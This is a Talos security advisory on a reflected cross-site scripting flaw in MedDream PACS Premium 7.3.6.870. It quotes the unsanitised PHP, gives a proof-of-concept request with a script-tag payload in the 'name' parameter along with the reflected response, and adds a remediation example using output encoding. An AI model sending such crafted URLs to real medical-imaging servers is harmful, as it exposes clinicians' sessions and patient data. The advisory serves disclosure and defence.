Talos Vulnerability Report

TALOS-2025-2267

MedDream PACS Premium modifyTranscript reflected cross-site scripting (XSS) vulnerability

January 20, 2026
CVE Number

CVE-2025-53707

SUMMARY

A reflected cross-site scripting (XSS) vulnerability exists in the modifyTranscript functionality of MedDream PACS Premium 7.3.6.870. A specially crafted malicious URL can lead to arbitrary JavaScript code execution in the victim's browser. An attacker can provide a crafted URL to trigger this vulnerability.

CONFIRMED VULNERABLE VERSIONS

The versions below were either tested or verified to be vulnerable by Talos or confirmed to be vulnerable by the vendor.

MedDream PACS Premium 7.3.6.870

PRODUCT URLS

MedDream PACS Premium - https://meddream.com/products/meddream-pacs-server/

CVSSv3 SCORE

6.1 - CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

CWE

CWE-79 - Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')

DETAILS

MedDream PACS is a DICOM 3.0-compliant server for storing, managing, and retrieving medical images. It includes a web-based DICOM viewer and administration interface, with features like user access control, study forwarding, and multi-format image support.

A pre-authentication reflected cross-site scripting vulnerability exists in the Pacs/modifyTranscript.php script. The value of the name GET parameter used in that script is written into the HTML output without any sanitization or output encoding. The vulnerable code appears as follows:

// line 39 

if (isset($_GET['name'])) {
    modifyEntryForm(urldecode($_GET['name']), $mbytes); /// [1]

// line 390

function modifyEntryForm($name, $mbytes)
{

    print "<td><input type='text' size=32 maxlength=64 name='name' value='$name' readonly></td></tr>\n"; /// [2]
    print "<tr><td>";
    print pacsone_gettext("Upload Transcription Template Word Document: ");
    print pacsone_gettext("(This Word template will contain the following bookmarks)");
    print "</td>";
    $disabled = "";
    if (isset($_SESSION['attachments'])) {
        // allow only 1 attachment for the template document
        if (count($_SESSION['attachments']))
            $disabled = "disabled";
    }
    $result = $dbcon->query("select path from xscriptemplate");
    if (!$result || $result->rowCount() == 0) {
        die(pacsone_gettext("Error: Cannot find transcription document template: ") . $name);  /// [3]
    }

The $name variable is taken directly from the request and is fully attacker-controlled [1]. Inside the modifyEntryForm function, the $name value is then printed into the page without sanitization in several places: into a single-quoted HTML attribute value [2] and into the body of the error message emitted by die() [3]. Below is an example request and the corresponding response, showing the injected HTML/JavaScript reflected at both locations:

GET /Pacs/modifyTranscript.php?name=%3Cscript%3Ealert(1)%3C/script%3E HTTP/1.1
Host: 192.168.0.42
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:141.0) Gecko/20100101 Firefox/141.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Cookie: sessionCookie=%20%A9%C7%FB%B1%7F2%8Cs%18%FE1%BD%E5%9E%2F%FBCB%F3S%BE%A6%EF%9E%A6%BEFe%FB%ED9; PHPSESSID=e57f22ea61aace53702ee3443fabe583; MEDDREAMSESSID=89F9D14757A096B63E147238A622FC72
Upgrade-Insecure-Requests: 1
Priority: u=0, i


RESP
HTTP/1.1 200 OK
Date: Wed, 20 Aug 2025 12:37:01 GMT
Server: =^_^=
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
X-Powered-By: PHP/8.3.22
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
X-Content-Type-Options: nosniff
X-Frame-Options: DENY
X-XSS-Protection: 1; mode=block
Referrer-Policy: no-referrer-when-downgrade
Permissions-Policy: geolocation=(), microphone=(), camera=()
Content-Length: 4901
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8

...
<table width=100% border=1 cellpadding=3 cellspacing=0>
<tr><td>Transcription Template Name:</td>
<td><input type='text' size=32 maxlength=64 name='name' value='<script>alert(1)</script>' readonly></td></tr>
<tr><td>Upload Transcription Template Word Document: (This Word template will contain the following bookmarks)</td>Error: Cannot find transcription document template: <script>alert(1)</script></div>
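
The following is an added illustration, not MedDream's code: it reproduces the two output sites from the snippet above ([2] the attribute value, [3] the die() message) with the untrusted $name encoded for its HTML context before it is written, and runs the payload from the request above through them. The function names modifyEntryFormRow and templateMissingMessage are hypothetical, and the literal error string stands in for the application's pacsone_gettext() helper.

```php
<?php
// Added example (not the vendor's code): context-aware output encoding for
// the $name value that Pacs/modifyTranscript.php reflects into the page.

// Encode for HTML text and attribute values. ENT_QUOTES is stated explicitly
// because the attribute in the vulnerable code is single-quoted: before PHP 8.1
// the default flags (ENT_COMPAT) left the single quote unencoded, which would
// still allow breaking out of value='...'. ENT_SUBSTITUTE avoids returning an
// empty string on invalid UTF-8 (which would otherwise silently drop output).
function h(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
}

// Hardened form of the input row printed at [2] in the advisory snippet.
function modifyEntryFormRow(string $name): string
{
    return "<td><input type='text' size=32 maxlength=64 name='name' value='"
        . h($name) . "' readonly></td></tr>\n";
}

// Hardened form of the error message printed at [3]. The literal stands in
// for pacsone_gettext() here; the encoding must be applied to $name, not to
// the translated template string.
function templateMissingMessage(string $name): string
{
    return "Error: Cannot find transcription document template: " . h($name);
}

// Note: PHP already URL-decodes query-string values when populating $_GET, so
// the extra urldecode() call at [1] in the original is redundant; the value
// that matters is whatever finally reaches the output functions.
$name = isset($_GET['name']) ? (string) $_GET['name'] : '';

// Constructed input for demonstration: the payload from the request above.
if ($name === '') {
    $name = '<script>alert(1)</script>';
}

echo modifyEntryFormRow($name);
echo templateMissingMessage($name), "\n";
// Both lines now contain &lt;script&gt;alert(1)&lt;/script&gt; as inert text
// instead of a live <script> element; the single quote would become &apos;.
```

Encoding at the output site is the relevant fix here; the response headers in the example above (X-XSS-Protection, X-Frame-Options, nosniff) do not prevent this reflection, since modern browsers ignore X-XSS-Protection and the other two do not address script injection in the page body.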

TIMELINE

2025-09-02 - Vendor Disclosure
2025-12-05 - Vendor Patch Release
2026-01-20 - Public Release

Credit

Discovered by Marcin 'Icewall' Noga of Cisco Talos.